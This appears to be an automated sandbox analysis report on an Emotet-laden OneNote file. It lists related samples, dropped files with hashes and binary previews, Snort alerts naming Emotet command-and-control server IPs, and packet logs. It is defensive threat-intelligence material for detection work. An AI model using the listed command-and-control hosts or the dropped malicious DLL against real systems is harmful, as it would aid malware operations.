                                            PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                              355444649229343017.oneGet hashmaliciousEmotetBrowse
                                                2961883463791890566.oneGet hashmaliciousEmotetBrowse
                                                  1002112025749539431938.oneGet hashmaliciousEmotetBrowse
                                                    Dokumente_2023.16.03_1155.oneGet hashmaliciousEmotetBrowse
                                                      Keith_Pierson_Toyota.oneGet hashmaliciousEmotetBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        penshorn.orgOPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_International.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        355444649229343017.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        2961883463791890566.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        1002112025749539431938.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Dokumente_2023.16.03_1155.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Keith_Pierson_Toyota.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        RACKCORP-APRackCorpAUOPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        Opast_International.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        355444649229343017.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        2961883463791890566.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        1002112025749539431938.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        Dokumente_2023.16.03_1155.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186
                                                        Keith_Pierson_Toyota.oneGet hashmaliciousEmotetBrowse
                                                        • 110.232.117.186

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ce5f3254611a8c095a3d821d44539877OPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_International.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        aRThcK3rSO.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        click.wsfGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        setup.exeGet hashmaliciousAmadey, Djvu, RedLine, SmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        purchase_order.exeGet hashmaliciousBluStealer, ThunderFox Stealer, a310LoggerBrowse
                                                        • 203.26.41.131
                                                        file.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        setup.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        it2NFpv2yt.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        file.exeGet hashmaliciousSmokeLoaderBrowse
                                                        • 203.26.41.131
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        untitled_764875647.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131
                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                        • 203.26.41.131

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllOPAST_GROUP_1.oneGet hashmaliciousEmotetBrowse
                                                          OPAST_GROUP_LLC.oneGet hashmaliciousEmotetBrowse
                                                            OPAST_GROUP.oneGet hashmaliciousEmotetBrowse
                                                              Opast_International.oneGet hashmaliciousEmotetBrowse
                                                                opastonline.com.oneGet hashmaliciousEmotetBrowse
                                                                  Opast_Publishing_Group_1.oneGet hashmaliciousEmotetBrowse
                                                                    Opast_Publishing_Group.oneGet hashmaliciousEmotetBrowse
                                                                      omicsonline.net.oneGet hashmaliciousEmotetBrowse
                                                                        report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                          2023-03-16_0923.oneGet hashmaliciousEmotetBrowse
                                                                            report_03_16_2023.oneGet hashmaliciousEmotetBrowse
                                                                              100935929722734787.oneGet hashmaliciousEmotetBrowse
                                                                                NG7553084292252526_202303161746.oneGet hashmaliciousEmotetBrowse
                                                                                  2023-03-16_1753.oneGet hashmaliciousEmotetBrowse
                                                                                    PUV026949243199756981_202303161748.oneGet hashmaliciousEmotetBrowse
                                                                                      355444649229343017.oneGet hashmaliciousEmotetBrowse
                                                                                        2961883463791890566.oneGet hashmaliciousEmotetBrowse
                                                                                          1002112025749539431938.oneGet hashmaliciousEmotetBrowse
                                                                                            Dokumente_2023.16.03_1155.oneGet hashmaliciousEmotetBrowse
                                                                                              Keith_Pierson_Toyota.oneGet hashmaliciousEmotetBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\regsvr32.exe
                                                                                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62582 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                Category:dropped
                                                                                                Size (bytes):62582
                                                                                                Entropy (8bit):7.996063107774368
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:Jk3XPi43VgGp0gB2itudTSRAn/TWTdWftu:CHa43V5p022iZ4CgA
                                                                                                MD5:E71C8443AE0BC2E282C73FAEAD0A6DD3
                                                                                                SHA1:0C110C1B01E68EDFACAEAE64781A37B1995FA94B
                                                                                                SHA-256:95B0A5ACC5BF70D3ABDFD091D0C9F9063AA4FDE65BD34DBF16786082E1992E72
                                                                                                SHA-512:B38458C7FA2825AFB72794F374827403D5946B1132E136A0CE075DFD351277CF7D957C88DC8A1E4ADC3BCAE1FA8010DAE3831E268E910D517691DE24326391A6
                                                                                                Malicious:false
                                                                                                Reputation:moderate, very likely benign file
                                                                                                Preview:MSCF....v.......,...................I.................BVrl .authroot.stl....oJ5..CK..8U....a..3.1.P. J.".t..2F2e.dHH......$E.KB.2D..-SJE....^..'..y.}..,{m.....\...]4.G.......h....148...e.gr.....48:.L...g.....Xef.x:..t...J...6-....kW6Z>....&......ye.U.Q&z:.vZ..._....a...]..T.E.....B.h.,...[....V.O.3..EW.x.?.Q..$.@.W..=.B.f..8a.Y.JK..g./%p..C.4CD.s..Jd.u..@.g=...a.. .h%..'.xjy7.E..\.....A..':.4TdW?Ko3$.Hg.z.d~....../q..C.....`...A[ W(.........9...GZ.;....l&?........F...p?... .p.....{S.L4..v.+...7.T?.....p..`..&..9.......f...0+.L.....1.2b)..vX5L'.~....2vz.,E.Ni.{#...o..w.?.#.3..h.v<.S%.].tD@!Le.w.q.7.8....QW.FT.....hE.........Y............./.%Q...k...*.Y.n..v.A..../...>B..5\..-Ko.......O<.b.K.{.O.b...._.7...4.;%9N..K.X>......kg-9..r.c.g.G|.*[.-...HT...",?.q...ad....7RE.......!f..#../....?.-.^.K.c^...+{.g......]<..$.=.O....ii7.wJ+S..Z..d.....>..J*...T..Q7..`.r,<$....\d:K`..T.n....N.....C..j.;.1SX..j....1...R....+....Yg....]....3..9..S..D..`.

                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\regsvr32.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):328
                                                                                                Entropy (8bit):3.119038565051529
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:kKw4ry/7UN+SkQlPlEGYRMY9z+4KlDA3RUecZUt:YwCvkPlE99SNxAhUext
                                                                                                MD5:B30D7FE50A8160A98B64722BDC09395D
                                                                                                SHA1:0698124C2D76A2CAD650C776812B979ACBFF00EA
                                                                                                SHA-256:6392F698AF772CFD6F70524336CD19571B93B432AD7566A3FEFA06806B48B15F
                                                                                                SHA-512:81FDA26F02D122F617031929842AD5F73326E535EE9AAB263DE6BDB28C354F7F31D3AF6622F77C51C558E85130E8DB59721694738FCE351164089FCFBE3C652C
                                                                                                Malicious:false
                                                                                                Preview:p...... ...........z.X..(....................................................... ..........).K......&...........v...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.2.f.9.2.9.a.7.4.b.d.9.1.:.0."...

                                                                                                C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \340\004, numeric, rows 262223750, columns 0
                                                                                                Category:dropped
                                                                                                Size (bytes):72
                                                                                                Entropy (8bit):2.106463217645438
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ulXH+lS8TcRaAqlAaRtl:KelS8Tc8TX
                                                                                                MD5:6D35FE979A2AF81158578D8FF8AA4390
                                                                                                SHA1:4FACFE5FFF9553E926FC82615BBFF18F47876715
                                                                                                SHA-256:41E5436CD2453FF8DC3D187CCC680CE58212D72C77CCA0E632B51085BDE7ECED
                                                                                                SHA-512:947226E35A9BEC0F93AE0467AC23DBE81EFC681A48F3FE6F49F70A2B0BDD35AB533165240D442C2492EA57D29CFA403B848FF8E9BB6EFEADAB507C12DEAE4CEE
                                                                                                Malicious:false
                                                                                                Preview:.....7..........$...................................T...................

                                                                                                C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):0.7042826857143938
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:RDeyO9stKE+mpfrS7xuYNgUlLa+ZovySB89u9Nj8lW:RyiKWf1YaUk+Zovp93
                                                                                                MD5:F66C2BA29F0287A81763F5410AC29E16
                                                                                                SHA1:1B9FFB04B5C6D5FF4806A62F41335911937F80DA
                                                                                                SHA-256:631A516E9F0DB198866FB04D4E84417C2619B346471BEF9475A7F168B8728EFF
                                                                                                SHA-512:5B9DDA0C6D524193DA9F77220320CDAD8A7BBCB6A68FBB32C6EF4742100423351AC46DA478F5FF84313E7241607A91BBE7B45D81EBDAD29FE13CE69CDCDD33C6
                                                                                                Malicious:false
                                                                                                Preview:.@..`...........................................................................d...`....................@.......B.......a.`.X..Zb..........................................@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1...........................................................=S.'j..... .....N.BN.X..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P.d...`...8...................................................................7.B.........17134.1.x86fre.rs4_release.180410-1804......$.@.........U......@..%|n.z.....P:\Target\x86\ship\onenote\x-none\onmain.pdb.ain.pdb.0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.............................................

                                                                                                C:\Users\user\AppData\Local\Temp\click.wsf

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):9
                                                                                                Entropy (8bit):2.94770277922009
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:tWn:tWn
                                                                                                MD5:07F5A0CFFD9B2616EA44FB90CCC04480
                                                                                                SHA1:641B12C5FFA1A31BC367390E34D441A9CE1958EE
                                                                                                SHA-256:A0430A038E7D879375C9CA5BF94CB440A3B9A002712118A7BCCC1FF82F1EA896
                                                                                                SHA-512:09E7488C138DEAD45343A79AD0CB37036C5444606CDFD8AA859EE70227A96964376A17F07E03D0FC353708CA9AAF979ABF8BC917E6C2D005A0052575E074F531
                                                                                                Malicious:true
                                                                                                Preview:badum tss

                                                                                                C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):316928
                                                                                                Entropy (8bit):7.337848702590508
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: OPAST_GROUP_1.one, Detection: malicious, Browse
                                                                                                • Filename: OPAST_GROUP_LLC.one, Detection: malicious, Browse
                                                                                                • Filename: OPAST_GROUP.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_International.one, Detection: malicious, Browse
                                                                                                • Filename: opastonline.com.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_Publishing_Group_1.one, Detection: malicious, Browse
                                                                                                • Filename: Opast_Publishing_Group.one, Detection: malicious, Browse
                                                                                                • Filename: omicsonline.net.one, Detection: malicious, Browse
                                                                                                • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                • Filename: 2023-03-16_0923.one, Detection: malicious, Browse
                                                                                                • Filename: report_03_16_2023.one, Detection: malicious, Browse
                                                                                                • Filename: 100935929722734787.one, Detection: malicious, Browse
                                                                                                • Filename: NG7553084292252526_202303161746.one, Detection: malicious, Browse
                                                                                                • Filename: 2023-03-16_1753.one, Detection: malicious, Browse
                                                                                                • Filename: PUV026949243199756981_202303161748.one, Detection: malicious, Browse
                                                                                                • Filename: 355444649229343017.one, Detection: malicious, Browse
                                                                                                • Filename: 2961883463791890566.one, Detection: malicious, Browse
                                                                                                • Filename: 1002112025749539431938.one, Detection: malicious, Browse
                                                                                                • Filename: Dokumente_2023.16.03_1155.one, Detection: malicious, Browse
                                                                                                • Filename: Keith_Pierson_Toyota.one, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):25280
                                                                                                Entropy (8bit):0.5434078989155284
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ohnnY+YoO4OOUQPSf+9olgk8Z4GQTaza2yX:0xYocOT6f+6lAUaza26
                                                                                                MD5:23F4BB1DEB1DB2981E5D6BCA9CEF3D0C
                                                                                                SHA1:4EE22EF03915F90F11CA2A1638B053D4201773DC
                                                                                                SHA-256:628359353E88E935B7A366ED1EB0E256B83ECF734D1145D749063FBACC309101
                                                                                                SHA-512:FF8E454166C94E19CD671DCFE77D05F9C9FAFAEAE12D1DC832EC90C95869CC157BF46748710B2AAE2B616F609851748C7CD603F8C1D0A31B472CC3EBDC90A006
                                                                                                Malicious:false
                                                                                                Preview:.%c....L..=../\U..u.pE..ka.l..................?.....I.......*...*...*...*...........................................................................................h............................b..............:7.....E....E..m........)K.z...E.Q.||...............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):3.4802265775463828
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:j8m+cdO5bWDMIFPbqzqgdCDDGTCDc6pd5m+cdO5bWDMh7+5DGqzWk7dCDGWG5CDY:cTKDt0qfGF6p/TKD9LZhP3s4
                                                                                                MD5:56FEFF26310788D7E507E757B170A3AA
                                                                                                SHA1:39FD624DAC6F7BC24DFDED7BF4CBBC8BE1347057
                                                                                                SHA-256:232CF6EF6DE876BB28B7BD4EB302D5A6B23D6AA2B1E7451677F3F93B84A4BD82
                                                                                                SHA-512:C17325AC363F1F63568315634F4D0C3D1957320A47276099D31726D78B3D464D6DBA210B21045D885D261FD1CF73874C65F9D6FC16F70DCCD6FB5C749CA002B8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.@.. .....Q{....i[M.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U5m..PROGRA~2.........L.qV.@....................V.....^..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.@.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.@.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.@....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O3RL5OZ6SA7ZCS8J33EG.temp

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3873
                                                                                                Entropy (8bit):3.4802265775463828
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:j8m+cdO5bWDMIFPbqzqgdCDDGTCDc6pd5m+cdO5bWDMh7+5DGqzWk7dCDGWG5CDY:cTKDt0qfGF6p/TKD9LZhP3s4
                                                                                                MD5:56FEFF26310788D7E507E757B170A3AA
                                                                                                SHA1:39FD624DAC6F7BC24DFDED7BF4CBBC8BE1347057
                                                                                                SHA-256:232CF6EF6DE876BB28B7BD4EB302D5A6B23D6AA2B1E7451677F3F93B84A4BD82
                                                                                                SHA-512:C17325AC363F1F63568315634F4D0C3D1957320A47276099D31726D78B3D464D6DBA210B21045D885D261FD1CF73874C65F9D6FC16F70DCCD6FB5C749CA002B8
                                                                                                Malicious:false
                                                                                                Preview:...................................FL..................F.@.. .....Q{....i[M.X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U5m..PROGRA~2.........L.qV.@....................V.....^..P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......PlP..MICROS~1..R.......PMPqV.@.....z....................C...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P8R..Office16..B.......PMPqV.@.....z........................O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV.@....3.........................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

                                                                                                C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\regsvr32.exe
                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):316928
                                                                                                Entropy (8bit):7.337848702590508
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:cwNQMQTlfdUPABVy559hhR3iP7TfPYbrF1EFVw0todxKROsCt:rNbadDBkZ6rPeEFizdxxsCt
                                                                                                MD5:BFC060937DC90B273ECCB6825145F298
                                                                                                SHA1:C156C00C7E918F0CB7363614FB1F177C90D8108A
                                                                                                SHA-256:2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
                                                                                                SHA-512:CC1FEE19314B0A0F9E292FA84F6E98F087033D77DB937848DDA1DA0C88F49997866CBA5465DF04BF929B810B42FDB81481341064C4565C9B6272FA7F3B473AC5
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L`.=...n...n...nCy.o...nCy.o...nCy.o...n.z.o(..n.z.o...n.z.o...nCy.o...n...nq..n.z.o...n.z.o...n.zsn...n...n...n.z.o...nRich...n................PE..d....6.d.........." ...!.F...................................................0............ .............................................T...d...d....`..(....0............... ..........8...........................p...@............`..`............................text....D.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA..\....P......................@..@.rsrc...(....`......................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:data
                                                                                                Entropy (8bit):6.73077865477405
                                                                                                TrID:
                                                                                                • Microsoft OneNote note (16024/2) 100.00%
                                                                                                File name:OMICS.one
                                                                                                File size:120428
                                                                                                MD5:cee0905efea3357f3dc9902754e5d47a
                                                                                                SHA1:693fdea99a495b339d8dd372b759f370cf7f1b7a
                                                                                                SHA256:d72079bdae7c59361f934bf92ec1a53875008113541db11124d167cc2eb69b32
                                                                                                SHA512:9b6184b4a515ba6022982d691983f0108d750e01c9f3edef118b6b8aff66e21d6f510d4a31aded07da973a00049ad6d989eefd537f7b3e0f3cf1b9f1387ee42a
                                                                                                SSDEEP:1536:RDBoTVdaeNtuXndCrJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX9:1BoC+tCYvSMVnte8ZP1Y6Jt
                                                                                                TLSH:B6C33BF1A8025C0AE123C976B1FB661399D052ED42283B2BF87D507DD978A20D5DD8EF
                                                                                                File Content Preview:.R\{...M..Sx.).......i.E......&.................?......I........*...*...*...*..................................................._fh.*..E.......n..w.....................h...........................8....... ....... ..}...M..t:."S.9.............TL.E..!......

                                                                                                File Icon

                                                                                                Icon Hash:d4dce0626664606c

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                192.168.2.4104.168.155.1434969680802404302 03/17/23-09:07:50.440401TCP2404302ET CNC Feodo Tracker Reported CnC Server TCP group 2496968080192.168.2.4104.168.155.143
                                                                                                192.168.2.491.121.146.474968680802404344 03/17/23-09:07:07.082827TCP2404344ET CNC Feodo Tracker Reported CnC Server TCP group 23496868080192.168.2.491.121.146.47
                                                                                                192.168.2.4182.162.143.56496894432404312 03/17/23-09:07:23.162928TCP2404312ET CNC Feodo Tracker Reported CnC Server TCP group 749689443192.168.2.4182.162.143.56
                                                                                                192.168.2.466.228.32.314968870802404330 03/17/23-09:07:17.980118TCP2404330ET CNC Feodo Tracker Reported CnC Server TCP group 16496887080192.168.2.466.228.32.31
                                                                                                192.168.2.4167.172.199.1654969180802404308 03/17/23-09:07:36.723536TCP2404308ET CNC Feodo Tracker Reported CnC Server TCP group 5496918080192.168.2.4167.172.199.165

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Mar 17, 2023 09:06:23.789850950 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:23.789948940 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:23.790174007 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:23.792867899 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:23.792901993 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.409953117 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.410152912 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:24.416637897 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:24.416673899 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.417330980 CET44349685203.26.41.131192.168.2.4
                                                                                                Mar 17, 2023 09:06:24.463357925 CET49685443192.168.2.4203.26.41.131
                                                                                                Mar 17, 2023 09:06:24.609322071 CET49685443192.168.2.4203.26.41.131
